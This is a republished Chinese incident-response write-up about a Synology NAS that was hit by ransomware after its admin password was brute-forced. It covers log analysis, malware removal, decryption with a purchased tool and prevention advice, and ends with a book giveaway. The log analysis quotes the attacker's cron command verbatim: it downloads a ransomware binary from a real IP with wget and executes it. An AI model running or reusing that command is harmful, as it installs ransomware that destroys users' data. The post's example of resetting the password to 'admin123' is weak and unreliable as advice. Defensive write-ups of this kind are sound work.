记一次群辉中勒索病毒后的应急响应【文末送书】

admin 2021年12月23日03:48:49评论274 views字数 3369阅读11分13秒阅读模式

群晖是一种NAS(网络附属存储)系统,在生活中主要扮演个人私有云角色,可以将文件存储于 NAS,并通过网页浏览器或手机应用程序可实现存储和共享,同时还提供的丰富应用以方便管理应用。借助群晖提供的 QuickConnect 快连服务,无需随身携带存储设备,即可以随时随地访问NAS。因为这些优点,群晖往往被当做是NAS的首选。

但偏偏这次被上勒索病毒了,通过资料查询发现该病毒早在2019年安全专家就已经分析过并已提供预警信息,一旦感染,其中的文件都会被加密,并通过留下的文件索要比特币。经过初步判断是通过web界面的弱口令进去的,之后创建了一个定时任务从美国某个IP下载文件来执行命令,并通过勒索病毒对文件进行了加密且暂时未发现该病毒有横向行动。本文主要记录群晖中勒索病毒后的应急响应过程。
记一次群辉中勒索病毒后的应急响应【文末送书】

一、攻击流程

(一)获取攻击目标

目标地址为http://x.x.x.x:5000,根据资料查询群晖的默认端口就是5000和5001,那么黑客应该是有针对性地通过批量扫描对公网上的IP地址的5000以及5001端口进行检测,如果扫描到为群晖系统,那么就记录下来保存结果
记一次群辉中勒索病毒后的应急响应【文末送书】

(二)实施弱口令爆破

通过工具对目标站点的默认管理账号admin进行爆破,通过admin/123456爆破进入群晖NAS系统,并且黑客采取了动态切换代理IP的方式来提升我们的溯源难度。

(三)植入勒索病毒

以admin登录后便植入了勒索病毒,加密硬盘数据(文件类型为encrypt)并留下了比特币支付地址。
记一次群辉中勒索病毒后的应急响应【文末送书】
记一次群辉中勒索病毒后的应急响应【文末送书】

二、应急流程

目标群晖系统版本的DSM为6.2.3-25426,CPU为INTEL Celeron J3455,在公网上没有已知漏洞存在能够直接进入目标。

记一次群辉中勒索病毒后的应急响应【文末送书】

(一)修改密码

既然知道了入侵源头,那么先把弱口令修改掉,防止黑客再次通过弱口令登录,可以通过web系统界面或服务器这两种方式进行修改

(1)直接修改密码

将密码修改为强口令,最好启用2步骤验证来提高安全性
记一次群辉中勒索病毒后的应急响应【文末送书】

(2)在服务器中修改

1、在web界面开启22端口
记一次群辉中勒索病毒后的应急响应【文末送书】
2、通过ssh登录目标群晖的admin账户(admin为群晖的默认账户)
3、输入以下命令,直接切换为root权限

sudo su -

4、输入以下命令,修改密码为admin123

synouser --setpw admin admin123

(二)日志分析

根据受害公司的反馈,他们是从7月29日发现文件被加密,而到了8月3日才寻求技术帮助,那么通过群晖自带的日志中心可以发现在7月28日晚上11点19分有来自83.97.20.103通过登录admin账号
记一次群辉中勒索病毒后的应急响应【文末送书】
当然溯源这个IP并没有什么卵用,因为是海外并已被标记为代理、扫描地址

记一次群辉中勒索病毒后的应急响应【文末送书】
记一次群辉中勒索病毒后的应急响应【文末送书】
通过日志查询还发现攻击者在7月28日19分还创建了定时任务
记一次群辉中勒索病毒后的应急响应【文末送书】
执行的具体命令如下,主要功能是进入/tmp目录下将crp_linux_386文件下载下来并赋予777权限输出为386,通过nohub永久执行386程序且不输出任何信息到终端

cd /tmp && wget --no-check-certificate -O 386 http://98.144.56.47/1/crp_linux_386;chmod 0777 ./386;nohub ./386 --syno=true </dev/null> /dev/null 2>&1 &
在微步上查询98.144.56.47,发现已标识为勒索程序,数据解密的希望已经十分渺茫
记一次群辉中勒索病毒后的应急响应【文末送书】

(三)病毒查杀

首先先将tmp目录下的386文件删除(但是未保存病毒原件,不能仔细分析该病毒,比较可惜),之后主要通过群晖自带的插件Antivirus Essential查看在群晖中是否留有病毒

(1)下载Antivirus Essential

记一次群辉中勒索病毒后的应急响应【文末送书】

(2)全盘扫描

记一次群辉中勒索病毒后的应急响应【文末送书】

(3)隔离病毒

记一次群辉中勒索病毒后的应急响应【文末送书】

(四)数据解密

这个太有意思了,在第一天访谈之后,老板去找了淘宝上的店家破解,我一开始以为淘宝的店家真的那么牛,这种加密的数据都能破解,后来访问了暗网的地址才发现,淘宝店家直接出钱买了解密工具,直接净赚xxxx元。
记一次群辉中勒索病毒后的应急响应【文末送书】
复制一个加密文件通过下载的解密程序尝试进行解密,最后成功解密。解密过程如下:

.decryptor_windows_x86.exe -s C:test

记一次群辉中勒索病毒后的应急响应【文末送书】
记一次群辉中勒索病毒后的应急响应【文末送书】

三、防范方法

1、停用默认管理账号admin,新建一个不同的账号并分配管理权限

2、杜绝弱口令,设置强口令,可参考等保要求中的长度八位以上,由数字、字母、特殊字符构成

3、修改默认登录端口,可修改如10000+以上的端口

4、开启登录失败锁定,对多次登录失败的IP进行锁定

5、安装安全工具(安全顾问),定期更新补丁并升级版本

6、启用防火墙,配置出入规则

7、文件版本回滚,能轻松将文件还原至感染前的状态,可以有效防止因感染勒索病毒后文件无法访问的情况

8、文件权限控制,在分享文件时设置访问密码、有效期等,并对文件权限进行控制

四、总结

这是我第一次做应急响应工作,可能无论是对群辉系统还是勒索病毒都知之甚少,难免会有一些解释不清或认知不足的地方。

作者:特mac0x01  转自:FreeBuf

今日赠书福利

记一次群辉中勒索病毒后的应急响应【文末送书】

一:黑客攻防从入门到精通(全新升级版)

    《黑客攻防从入门到精通(加密与解密篇)》由浅入深、图文并茂地再现了计算机与手机安全相关的多方面知识。全书共22 章,分别为社会工程学、计算机与网络反黑基础、Windows10系统防火墙与Windows Defender、 Windows 10高级安全管理、系统和数据的备份与恢复、计算机与网络控制命令、扫描与嗅探:确定目标与探索网络资源、 木马防范技术、病毒防范技术、Windows 系统漏洞攻防技术、计算机后门技术、程序的加密与解密技术、局域网安全防范 技术、计算机远程控制技术、Web站点安全防范技术、清理恶意插件和软件、网游与网吧安全防范技术、网络账号防黑实战、 网络支付工具的安全、无线网络安全防范技术基础、Wi-Fi 安全防范技术、蓝牙安全防范技术。本书语言简洁、流畅,内容丰富全面,适用于计算机初、中级用户、计算机维护人员、IT 从业人员及对黑客攻防与 网络安全维护感兴趣的计算机中级用户,各大计算机培训班也可以将其作为辅导用书。



二:深入浅出TCP/IP和VPN


    本书是一本图文并茂的网络技术书籍,旨在让读者理解TCP/IP的基本知识和原理,掌握TCP/IP的基本技术及应用。本书主要内容包括:第1章为TCP/IP 概述;第2章具体讲述IP协议;第3章主要讲解路由协议;第4章具体讲述TCP协议;第5章主要讲解UDP;第6章主要讲解GRE;第7章主要讲解IPSec;第8章主要讲解MPLS;第9章主要讲解BGP;第10章主要讲解MP-BGP、MPLS、L3VPN;第10章主要讲解VXLAN;第11章主要讲解SDN;第12章主要讲解CloudVPN与SD-WAN;第13章主要讲解应用场景及组网,以及基于native IP(IP协议)、VPN、SDN/SD-WAN 的基本应用。本书既适合计算机网络的开发人员阅读,也可作为大专院校相关专业的教学参考用书。


三:企业信息安全建设与运维指南

    本书主要包括基础安全设施建设、安全自动化系统建设、业务安全体系建设3个部分。第一部分介绍当进入一个安全建设空白或基本为零的企业时,如何着手规划并一步步建成较为完善的安全体系;第二部分主要介绍安全自动化,帮助大家掌握开源的二次开发思路,设计适合企业自身特点的安全系统;第三部分介绍业务安全体系建设,包括互联网黑产攻击手法、风控系统建设方案和业务安全风险防控体系建设实践。
记一次群辉中勒索病毒后的应急响应【文末送书】

     为了感谢大家一直以来的关注与支持,会有书籍免费赠送记一次群辉中勒索病毒后的应急响应【文末送书】,中奖者可以从上述书籍中任选一本。

     规则如下:

     1.  本文末点‘在看’,不需要转发朋友圈,点个‘在看’就可以。

     2. 公众号内发送“抽奖”即可扫描参与抽奖,注意看是发送暗号“抽奖

     3. 中奖者不满足条件1,视为放弃中奖资格。

     4. 活动截止时间为9月1日 18:00点,到时候还要中奖者及时联系号主留下你的中奖核验二维码、收货地址、姓名、手机号以及想要的书籍,好给您发送书籍哦!24小时内未联系号主视为自动放弃!骗书行为出版社会永久拉黑!


先点“再看”,然后点击下方公众号私聊发送“抽奖” 即可马上扫描参与抽奖记一次群辉中勒索病毒后的应急响应【文末送书】

本文始发于微信公众号(LemonSec):记一次群辉中勒索病毒后的应急响应【文末送书】

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月23日03:48:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次群辉中勒索病毒后的应急响应【文末送书】https://cn-sec.com/archives/484300.html

发表评论

匿名网友 填写信息